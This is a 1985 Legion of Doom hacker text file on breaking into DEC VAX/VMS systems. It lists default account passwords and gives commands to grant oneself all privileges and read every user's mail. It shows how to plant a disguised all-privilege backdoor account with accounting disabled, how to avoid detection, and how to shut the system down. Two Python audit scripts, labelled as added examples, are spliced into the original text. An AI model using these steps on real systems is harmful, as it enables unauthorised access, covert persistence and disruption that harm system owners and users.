

$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
L                                   L
O            Lex Luthor             O
D               and                 D
$    The Legion Of Doom/Hackers     $
L            Present:               L
O       HACKING VAX'S VMS           O
D                                   D
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
L                                   L
O This file will list most  default O
D accounts/passwords,  commands for D
$ non-privileged accts and commands $
L for privileged accounts,  how  to L
O set up your own acct,  list users O
D and how to shut down the  system. D
$                                   $
LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$L
O  (C)    WRITTEN 10-APR-85         O
D  Written by:  LOD/H               D
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$




INTRODUCTION:
-------------

   The VAX is made by DEC (Digital Equipment Corp) and can run a variety of
operating systems.  In this file, I will talk about the VMS (Virtual Memory
Operating System).  The VAX is a 32 bit machine with a 32 bit virtual address
space.

ENTRANCE:
---------

   When you first connect with  a VAX you type either  a return, a ctrl-c, or  a
ctrl-y.  It will then respond with something similar to:

LOD/H NETWORK COMMUNICATIONS RESEARCH SYSTEM VMS V4.0

Username:
Password:


   The  most frequent way of  gaining access to a computer  system is by using a
'default' login/password. In this  example you may try  LOD as the username  and
RESEARCH  as the  password or  a combination of words  in the opening banner (if
there is one) which  may allow you  access, otherwise you will  have to try  the
DEFAULT METHOD of entry.  The version listed above (V4.0) is the latest  version
to my knowledge of VMS.  The more widely used version that I have seen is V3.7.

   When DEC sells a VAX/VMS, the system comes equipped with 4 accounts which are:

DEFAULT -- This serves as a template  in creating user records in the UAF  (User
Authorization  File). A new  user record is  assigned the values  of the DEFAULT
record except where the system manager changes those values.  The DEFAULT record
can be modified but cannot be deleted from the UAF.

SYSTEM  --  Provides  a  means  for  the system  manager  to  log  in  with full
privileges. The SYSTEM  record can be  modified but cannot  be deleted from  the
UAF.

FIELD -- Permits DIGITAL field service personnel to check out a new system.  The
FIELD record can be deleted once the system is installed.

SYSTEST -- Provides an appropriate environment for running the User  Environment
Test  Package  (UETP). The  SYSTEST record  can  be deleted  once the  system is
installed.

   Usually the SYSTEM MANAGER  adds, deletes, and  modifies these records  which
are in the UAF when the system arrives, thus, eliminating the default passwords,
but this is not true in all cases.

   The 'default' passwords that I have found to get me into a system are:

Username:    Password:
---------    ---------
SYSTEM       MANAGER or OPERATOR
FIELD        SERVICE or TEST
DEFAULT      USER or DEFAULT
SYSTEST      UETP or SYSTEST

   Other typical VMS accounts are:

VAX          VAX
VMS          VMS
DCL          DCL
DEMO         DEMO
TEST         TEST
HELP         HELP
NEWS         NEWS
GUEST        GUEST
GAMES        GAMES
DECNET       DECNET

   Or a combination  of the various  usernames and passwords.  If none of  these
get  you in, then you should move on to the next system unless you have a way to
get usernames/passwords, like from trashing, stealing passwords directly, or  by
some other means.

YOU'RE IN!
----------

   You will know that you are in by receiving the prompt of a dollar sign '$'.
You will be popped into the default directory, which depends on what account
you are logged in as.  If you get in as the system manager, you have full
access.  If you get in on the FIELD or SYSTEST accounts you may or may not have
full access, but you will have the privileges to give yourself full access.  To
give privs to yourself:

$ SET PROCESS /PRIVS=ALL

   Once you have full privs, you can access any directory and any file, and also
run the AUTHORIZE pgm which will be explained.

   The VMS system has full help files available by typing HELP. You can use  the
wildcard character of an '*' to list out info on every command:

$ HELP *

   When  you first logon, it may be to your advantage to get a list of all users
currently logged onto the system if there are any at all.  You can do this by:

$ SHOW USERS

VAX/VMS Interactive Users - Total = 4
     01-MAY-1985 11:37:21.73

OPA0:         DEMO         004C004C
TTD2:         LAWRENCL     0059004A
TXB1:         FIELD        008D004E
TXB3:         TWYLYSYS     01190057


   It  is highly recommended that if you are  logged on in the day and there are
people logged in, especially the system manager or the account you are logged on
as, logout and call back later.  I have found that no matter what system you are
on, the best way to remain undetected is  to call when no one is on the  system.
You do not want to call too late since the system keeps a record of when each
user logs in and out.

   To communicate with other users or other  hackers that you are on the  system
with, use the PHONE Utility.

$ PHONE Username


   If the system has DEC-net, you can see what available nodes there are by:

$ SHOW NETWORK

   If you have mail the system will tell you so after logging in, simply type:

$ MAIL

   This will invoke the Personal Mail Utility, you can use help from there.

   There are a lot of commands and many are not too useful (to the hacker
anyway), so I will not go into detail.  One thing about VMS: there is plenty of
on-line help available which will enable you to learn the operating system
fairly well.

DIRECTORIES:
------------


   To see what you have in your directory type:

$ DIR

   To get a list of directories on the system type:

$ DIR <*.*>

   When a VAX/VMS is first installed,  it comes with nine directories which  are
not listed when you execute the DIR <*.*> command:

<SYSLIB>
   This directory contains various macro and object libraries.

<SYSMSG>
   This directory contains system message files.

<SYSMGR>
   This directory contains files used in managing the operating system.

<SYSHLP>
   This directory contains text files and help libraries for the HELP utility.

<SYSERR>
   This is the directory for the error log file (ERRLOG.SYS).

<SYSTEST>
   This  directory contains files used in testing the functions of the operating
system.

<SYSMAINT>
   This directory contains system diagnostic programs.

<SYSUPD>
   This directory contains files used in applying system updates.

<SYSUPD.EXAMPLES>
   This directory contains sample driver programs, user-written system services,
and other source programs.

<SYSEXE>
   This directory contains the executable images of most of the functions of the
operating system.

   Inside these directories are files with the following file-types:




File-type ! Description:     ! Command:
----------+------------------+-------------------------------------------------
 .txt     ! Ascii text file  ! TYPE file-name
 .hlp     ! System Help file ! TYPE file-name
 .dat     ! Data file        ! TYPE file-name
 .msg     ! Message file     ! TYPE file-name
 .doc     ! Documentation    ! TYPE file-name
 .log     ! Log file         ! TYPE file-name
 .err     ! Error msg file   ! TYPE file-name
 .seq     ! Sequential file  ! TYPE file-name
 .sys     ! System file      ! FILE-NAME
 .exe     ! Executable file  ! FILE-NAME
 .com     ! Command file     ! COMMAND NAME
 .bas     ! Basic file       ! RUN file-name
----------+------------------+-------------------------------------------------

   There are others but you won't see them as much as the above.  You can change
directories either  by using  the CHANGE  command or  by using  the SET  DEFAULT
command:

$ CHANGE <DIR.NAM>
                          or
$ SET DEFAULT <DIR.NAM>

   You can now list and execute the files in this directory without first typing
the directory name  followed by the  file name  as long as  you have  sufficient
access.  If you  don't have  sufficient access you  can still  view files within
directories that you cannot default to by:

$ TYPE <LOD.DIR>LOD.MAI;1

   This will  list  the contents  of  the file  LOD.MAI;1  in the  directory  of
<LOD.DIR>.

   The use of wildcards is very helpful when you desire to view all the mail or
something on a system.  To list out all the users' mail, if you have access, type:

$ TYPE <*.*>*.MAI;*

   As you may notice mail files have the extension of MAI at the end.  The ;1 or
;2 etc.  are used to number files with the same name.

PRIVILEGES
-----------

   Privileges fall into seven categories according  to the damage that the  user
possessing them could cause the system:

None   - No privileges
Normal - Minimum privileges to effectively use the system
Group  - Potential to interfere with members of the same group
Devour - Potential to devour noncritical system-wide resources
System - Potential to interfere with normal system operation
File   - Potential to compromise file security
All    - Potential to control the system (hehe)


THE UAF
-------

   The  User Authorization File contains the names of users who may log into the
system and also contains a record of  the user's privileges. Each record in  the
UAF includes the following:

1. Name and Password
2. User Identification Code (UIC) -- Identifies a user by a group number and a
   member number.
3. Default file specification -- Has the default device and directory names for
   file access.
4. Login command file -- Names a command procedure to be executed automatically
   at login time.
5. Login flags -- Allows the system manager to inhibit the use of the CTRL-Y
   function, and lock user passwords.
6. Priority -- Specifies the base priority of the process created by the user at
   login time.
7. Resources -- Limits the system resources the user may use.
8. Privileges -- Limits activities the user may perform.

   If you have SYSTEM MANAGER privileges, you will be able to add, delete, and
modify records in the UAF.

   The AUTHORIZE Utility allows you to modify the information in the UAF.  It is
usually found in the <SYSEXE> directory.  The commands for AUTHORIZE are:

ADD username <qualifier..>  Adds a record to the UAF
EXIT (or CTRL-Z)            Returns you to command level
HELP                        Lists the AUTHORIZE commands
LIST <userspec> </FULL>     Creates a listing file of UAF records
MODIFY username             Modifies a record
REMOVE username             Deletes a record
SHOW                        Displays UAF records

   The most useful besides ADD is the SHOW command.  SHOW displays reports for
selected UAF records.  You can get a /BRIEF listing or a /FULL listing.  But
before you do that, you may want to make sure no one is logged on besides you.
And to make sure no one can log on, you do this by:

$ SET LOGINS /INTERACTIVE=0

   This establishes the maximum number of users able to log in to the system;
this command does not affect users currently logged on.  I never do the above
since it is not really needed and looks very suspicious.  Now, to list out the
user file do the following:

$ SET DEFAULT <SYSEXE>
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF

Owner           Username     UIC     Account  Privs  Priority  Default Directory

SYSTEM MANAGER  SYSTEM    <001,004>  SYSTEM   All       4      SYS$SYSROOT:
FIELD SERVICE   FIELD     <001,010>  FIELD    All       4      SYS$SYSROOT:

   To get a full report:

(if you used the SET DEFAULT cmd earlier and the default dir is the <SYSEXE>
directory, then you don't have to re-type it).

$ RUN AUTHORIZE (or if you still have the UAF> prompt):
UAF> SHOW * /FULL

Username:  SYSTEM             Owner:  SYSTEM MANAGER
Account:   SYSTEM             UIC:    <001,004>
CLI:       DCL                LGICMD:
Default Device: SYS$ROOT:
Default Directory: <SYSMGR>
Login Flags:
Primary days:   Mon Tue Wed Thu Fri
Secondary days:                     Sat Sun
No hourly restrictions
PRIO:     4  BYTLM:         20480  BIOLM:            12
PRCLM:   10  PBYTLM:            0  DIOLM:            12
ASTLM:   20  WSDEFAULT:       150  FILLM:            20
ENQLM:   20  WSQUOTA:         350  SHRFILLM:          0
TQELM:   20  WSECTENT:       1024  CPU:        no limit
MAXJOBS:  0  MAXACCTJOBS:       0  PGFLQUOTA:    200000
Privileges:
  CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG-IO GROUP ACNT PRMCEB
  PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD OPER EXQUOTA NETMBX VOLPRO PHY-IO
  BUGCHK PRMGBL SYSGBL MOUNT  PFNMAP SHMEM SYSPRV SYSCLK

UAF>

   Unfortunately, you cannot get a listing of passwords, though you can get the
list of users as shown above.  The passwords are encrypted just like on a UNIX
system, but you cannot even see the encrypted password unless you look at the
actual file that the UAF> prompt draws its information from.

   After listing out all the users, you figure that since all these other people
are on here, why can't I have my own account? Well, if you have sufficient
privs, you can!

UAF>ADD SYSLOG /PASSWORD=LEGION /UIC=<014,006> /CPUTIME=0 /DEVICE=SYS$SYSROOT-
-/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL /OWNER=DIGITAL /NOACCOUNTING


1) You ADD the username SYSLOG (you do not want to create a user like Lex,
   since it will be too obvious and not look right).  I have had much success
   in not being detected with this acct.
2) You specify the password for the SYSLOG account.
3) You assign a UIC (User Ident Code) which consists of two numbers in the range
   of 0 through 377, separated by a comma and enclosed in brackets.  The system
   assigns a UIC to a detached process created for the user at login time.  User
   processes pass on this UIC to any subprocesses they create. Processes can
   further assign UICs to files, mailboxes, devices, etc.  You can assign the
   same UIC to more than 1 user.
4) CPUTIME is in delta format, 0 means INFINITE, which is what we will use.
5) You specify the DEVICE that is allocated to the user when they login, which
   for our purposes, is the SYS$SYSROOT device, other devices are: SYS$DEVICE,
   SYS$SYSDISK, DB1, etc.
6) Specifying an account is not necessary, but if you do, use one that is listed
   as another users', since you don't want to attract too much attention to the
   account.
7) The default directory can be a directory currently on the system or it can be
   created after the UAF record is added.  You may want to use one of the ones
   mentioned earlier in the file, but be sure not to use the <SYSMGR> directory.
8) You can select one of the privileges listed earlier in this file, we will
   use, of course, ALL.
9) OWNER is similar to the ACCOUNT qualifier, again, look at what the other
   users have listed.
10) NOACCOUNTING will disable system accounting records, thus not adding
    information to the ACCOUNTING.DAT file.


   After the UAF record is successfully added, you should create a directory by
specifying the device name, directory name, and UIC of the UAF record.
Protection for the "ordinary" user is normally Read, Write, Execute, and Delete
access for system, owner, and group processes, and Read and Execute access for
world processes.  To create a directory:

$ CREATE SYS$SYSROOT:<SYSLOG> /DIRECTORY /OWNER_UIC=<014,006>
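The following Python is an added example and is not part of this file: it is the check a system manager would run over a saved UAF> SHOW * /FULL listing to catch exactly the kind of record the ADD command above creates (a second login holding control privileges, homed in one of the nine shipped system directories) and installer accounts such as FIELD and SYSTEST that were never removed. The sample listing is constructed; the privilege names, directory names and account names are the ones given earlier in this file.

```python
import re

# Constructed sample of UAF> SHOW * /FULL output, trimmed to the fields read here:
# SYSTEM as on the page, SYSLOG as the ADD above would create it, FIELD as shipped.
SAMPLE_UAF = """\
Username:  SYSTEM             Owner:  SYSTEM MANAGER
Account:   SYSTEM             UIC:    <001,004>
Default Directory: <SYSMGR>
Privileges:
  CMKRNL CMEXEC SYSNAM GRPNAM DETACH SETPRV WORLD OPER SYSPRV

Username:  SYSLOG             Owner:  DIGITAL
Account:   VMS                UIC:    <014,006>
Default Directory: <SYSERR>
Privileges:
  CMKRNL SETPRV SYSPRV OPER TMPMBX NETMBX

Username:  FIELD              Owner:  FIELD SERVICE
Account:   FIELD              UIC:    <001,010>
Default Directory: <SYSMAINT>
Privileges:
  TMPMBX NETMBX
"""

CONTROL_PRIVS = {"SETPRV", "CMKRNL", "CMEXEC", "SYSPRV"}  # enough to take over
SYSTEM_DIRS = {"<SYSLIB>", "<SYSMSG>", "<SYSMGR>", "<SYSHLP>", "<SYSERR>",
               "<SYSTEST>", "<SYSMAINT>", "<SYSUPD>", "<SYSEXE>"}  # shipped dirs
INSTALL_ACCOUNTS = {"FIELD", "SYSTEST"}  # deletable once the system is installed

def parse_uaf(text):
    """Split SHOW /FULL output into one dict per UAF record."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec, in_privs = {"privs": set()}, False
        for line in block.splitlines():
            if in_privs:                    # privilege names run to the block end
                rec["privs"].update(line.split())
            elif line.startswith("Privileges:"):
                in_privs = True
            elif m := re.match(r"Username:\s+(\S+)\s+Owner:\s+(.*)", line):
                rec["username"], rec["owner"] = m.group(1), m.group(2).strip()
            elif m := re.search(r"UIC:\s+(<[^>]*>)", line):
                rec["uic"] = m.group(1)
            elif m := re.match(r"Default Directory:\s+(\S+)", line):
                rec["directory"] = m.group(1)
        records.append(rec)
    return records

def audit_uaf(text):
    """Return (username, reason) pairs a system manager should review."""
    findings = []
    for rec in parse_uaf(text):
        user = rec["username"]
        if user in INSTALL_ACCOUNTS:
            findings.append((user, "INSTALL_ACCOUNT"))
        if user != "SYSTEM" and rec["privs"] & CONTROL_PRIVS:
            findings.append((user, "CONTROL_PRIV"))  # a second all-powerful login
        if user != "SYSTEM" and rec.get("directory") in SYSTEM_DIRS:
            findings.append((user, "SYSTEM_DIR"))    # home hidden among system dirs
    return findings
```

Run audit_uaf over a listing captured with LIST /FULL and review every flagged record; on this sample it reports SYSLOG twice and FIELD twice.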


ACCOUNTING:
-----------

   For accounting purposes, the VAX/VMS system keeps records of the use of the
system resources.  These records are kept in the accounting log file:
SYS$SYSDISK:<SYSMGR>ACCOUNTING.DAT, which is updated each time an accountable
process terminates, each time a print job is completed and each time a login
failure occurs.  In addition, users can send messages to be inserted into the
accounting log file.

   To suppress the accounting function and thus avoid accounting for the use of
system resources requires privilege.  The /NOACCOUNTING qualifier is used to
disable all accounting in a created process.

   You may want to see how often the account you are using or another account
logs in, you can do this by:

$ ACCOUNTING /USER=(SYSLOG)

  Date / Time         Type     Subtype      Username  ID        Source  Status
------------------------------------------------------------------------------
30-JAN-1985 00:20:56  PROCESS  INTERACTIVE  SYSLOG    000000C5  NONE    00038090
12-FEB-1985 04:11:34  PROCESS  INTERACTIVE  SYSLOG    000000A9  NONE    00038110
01-MAY-1985 10:40:22  PROCESS  INTERACTIVE  SYSLOG    000000C4  NONE    00030001

   This is the accounting information for the user SYSLOG, which shows that the
user has logged on three times so far.  Some users may be on hundreds of times,
thus it would be an ideal account to use/abuse since it will not be likely that
the unauthorized accesses will be detected.
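As an added example (not from the original file), here is how a system manager could read the same ACCOUNTING /USER output and flag interactive logins that fall on weekends or overnight, the times an intruder following the advice above would prefer. The sample rows are constructed from the three shown plus one Saturday login; the 22:00 to 06:00 quiet window and the Mon-Fri primary days are an assumed site policy taken from the UAF record shown earlier.

```python
from datetime import datetime

# Constructed sample of $ ACCOUNTING /USER=(SYSLOG) output: the three rows shown
# on the page plus one Saturday login added for illustration.
SAMPLE_ACCOUNTING = """\
  Date / Time         Type     Subtype      Username  ID        Source  Status
------------------------------------------------------------------------------
30-JAN-1985 00:20:56  PROCESS  INTERACTIVE  SYSLOG    000000C5  NONE    00038090
12-FEB-1985 04:11:34  PROCESS  INTERACTIVE  SYSLOG    000000A9  NONE    00038110
01-MAY-1985 10:40:22  PROCESS  INTERACTIVE  SYSLOG    000000C4  NONE    00030001
04-MAY-1985 13:05:10  PROCESS  INTERACTIVE  SYSLOG    000000D1  NONE    00030001
"""

# Assumed site policy: the UAF record shown earlier allows Mon-Fri as primary
# days with no hourly restrictions, so Sat/Sun or 22:00-06:00 counts as off-hours.
PRIMARY_DAYS = {0, 1, 2, 3, 4}          # Monday..Friday as datetime.weekday()
QUIET_START, QUIET_END = 22, 6          # hours; the quiet window wraps midnight

def parse_accounting(text):
    """Return (timestamp, type, subtype, username) for each data row."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0].startswith("-"):
            continue                    # blank and rule lines carry no record
        try:
            stamp = datetime.strptime(f"{parts[0]} {parts[1]}", "%d-%b-%Y %H:%M:%S")
        except ValueError:
            continue                    # the "Date / Time" column header lands here
        rows.append((stamp, parts[2], parts[3], parts[4]))
    return rows

def is_off_hours(stamp):
    """True for weekend logins or logins inside the overnight quiet window."""
    if stamp.weekday() not in PRIMARY_DAYS:
        return True
    return stamp.hour >= QUIET_START or stamp.hour < QUIET_END

def off_hours_logins(text):
    """Return (username, timestamp) for interactive logins outside the policy."""
    return [(user, stamp.isoformat(sep=" "))
            for stamp, typ, sub, user in parse_accounting(text)
            if typ == "PROCESS" and sub == "INTERACTIVE" and is_off_hours(stamp)]
```

On the sample, the two overnight logins and the Saturday login are reported and the Wednesday-morning one is not.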

LOGGING OFF:
------------

   Simply type:

$ LOGOUT

   The system will display the usual CPU time used and other statistics.

SHUTTING DOWN THE SYSTEM:
-------------------------

   Many files I have read tell you how to destroy a system, shut it down etc.  I
do not recommend nor practice any type of malicious activities.  Though, I do
realize that in the process of gaining access to a system, the Hacker or System
Cracker, whichever you prefer, gets bored or learns as much as he wants to learn
about the system.  I will explain how to shut down the system correctly; this
can be used in case you think you screwed the system and shutting down the
system may be the only way to avoid considerable damage.

   The normal reasons for shutting down the system are: danger of power loss,
need to backup the system disk, hardware or software problems, or to use the
system for a specific application.  Below is the command procedure which
describes how to shut down the system in an orderly fashion.  This procedure is
contained in a command file.

PROCEDURE:

1) Type the following command to begin the shutdown procedure:

   $ @SYS$SYSTEM:SHUTDOWN

2) Enter time till shutdown:

   How many minutes until shutdown?:5

3) You will now have to give the reason for shutting it down:

   Reason?:possible system damage

4) Respond to typing a Y or N to the following question:

   Do you want to spin down the disks?:N

After a short period the message:

SYSTEM SHUTDOWN COMPLETE - USE CONSOLE TO HALT SYSTEM

At this point, the system cannot be totally shut down, but all processes are
halted, thus not causing any further damage to the system. (Remember, the reason
you should have shut it down was because potential damage to the system could
have occurred and you were acting in the best interest of the system.) Yeah sure.

READING MATERIAL:
-----------------

   For general background information about the VAX/VMS system, see the VAX/VMS
Primer and the VAX/VMS Summary Description and Glossary.  The following VAX/VMS
documents may also be useful:

 o VAX/VMS Command Language User's Guide
 o VAX/VMS Guide to Using Command Procedures
 o VAX/VMS Release notes
 o VAX-11  RSX-11M User's Guide
 o VAX-11  Software Installation Guide
 o VAX/VMS System Manager's Guide
 o VAX/VMS System Messages and Recovery Procedures Manual
 o VAX-11  Utilities Reference Manual
 o RMS-11  User's Guide

   For controlling network operations, refer to the DECNET-VAX System Manager's
Guide.

Lex Luthor
Legion Of Hackers!
